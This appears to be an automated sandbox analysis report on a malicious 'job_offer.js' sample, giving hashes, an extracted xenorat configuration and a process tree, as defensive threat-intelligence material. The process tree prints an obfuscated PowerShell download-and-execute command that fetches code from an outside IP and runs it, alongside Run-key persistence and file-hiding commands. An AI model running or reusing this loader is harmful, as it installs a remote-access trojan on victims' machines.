Analysis
-
max time kernel
300s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
18-07-2024 02:05
Static task
static1
Behavioral task
behavioral1
Sample
job_offer.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
job_offer.js
Resource
win10v2004-20240709-en
General
-
Target
job_offer.js
-
Size
7KB
-
MD5
99d7d5e0a68fab595c03ba3e5cd12f4c
-
SHA1
2c6100789c8906e9b308f80c9f4e3839c8aea41f
-
SHA256
09be56cdd4003075a5a95a741f019105b23dbc140c5e8a034b0795c0a6ef87b9
-
SHA512
788f5d86d96fc931ff5749dd0e62b874725c47a2ee3712ecf76a9b4867747a337e7dcd5e122d739785056c642d7521296f5c756691dddacc9c8ec4056b630b20
-
SSDEEP
192:n5o3kqWRrmBE1KE5PqecWjEBiARGBRjdJU+udDqpkE+Rv:n5+zcr2YyTiiG3e02EEv
Malware Config
Extracted
http://176.113.115.177/x/z.png
Extracted
xenorat
176.113.115.177
RGHEHTJ4GEJHTJSHJAJHAJHA
-
install_path
nothingset
-
port
4404
-
startup_name
nothingset
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2636 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation wscript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "wscript //E:VBScript C:\\Users\\Public\\0x.log //Nologo" powershell.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 456 cmd.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2636 set thread context of 860 2636 powershell.exe 98 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 112 ipconfig.exe 3688 ipconfig.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2636 powershell.exe 2636 powershell.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe 860 RegSvcs.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 860 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2636 powershell.exe Token: SeDebugPrivilege 860 RegSvcs.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1996 wrote to memory of 2636 1996 wscript.exe 84 PID 1996 wrote to memory of 2636 1996 wscript.exe 84 PID 2636 wrote to memory of 112 2636 powershell.exe 86 PID 2636 wrote to memory of 112 2636 powershell.exe 86 PID 2636 wrote to memory of 456 2636 powershell.exe 95 PID 2636 wrote to memory of 456 2636 powershell.exe 95 PID 456 wrote to memory of 4064 456 cmd.exe 96 PID 456 wrote to memory of 4064 456 cmd.exe 96 PID 2636 wrote to memory of 3688 2636 powershell.exe 97 PID 2636 wrote to memory of 3688 2636 powershell.exe 97 PID 2636 wrote to memory of 860 2636 powershell.exe 98 PID 2636 wrote to memory of 860 2636 powershell.exe 98 PID 2636 wrote to memory of 860 2636 powershell.exe 98 PID 2636 wrote to memory of 860 2636 powershell.exe 98 PID 2636 wrote to memory of 860 2636 powershell.exe 98 PID 2636 wrote to memory of 860 2636 powershell.exe 98 PID 2636 wrote to memory of 860 2636 powershell.exe 98 PID 2636 wrote to memory of 860 2636 powershell.exe 98 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4064 attrib.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\job_offer.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(N%ew-Obje%c%t Ne%t.W%e';$c4='bCl%ie%nt).Do%%wn%l%o';$c3='adS%tri%%ng(''h%tt%p:%%//17%%%6.1%13%.11%%5.1%%%77%/%x/z%.p%n%%%g'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns3⤵
- Gathers network information
PID:112
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Public\0x.log3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Windows\system32\attrib.exeattrib +h C:\Users\Public\0x.log4⤵
- Views/modifies file attributes
PID:4064
-
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns3⤵
- Gathers network information
PID:3688
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:860
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
94KB
MD5221bae885f4eaac29602dad1c523ec14
SHA1121c3f85ea26a86a7d058f9c04bc2ac826005c61
SHA25675205b562bd838a17280a747905825dd39948aa464279407851469715711f7dd
SHA51208903b1911e9bbd4a10ce14ab3d1c59fb24dce60b730190799d6c37bb68461d774c9c09c5fab17e10fdd5457bb05f2441d6a7e05ed861c52bf5c720b67c7ff96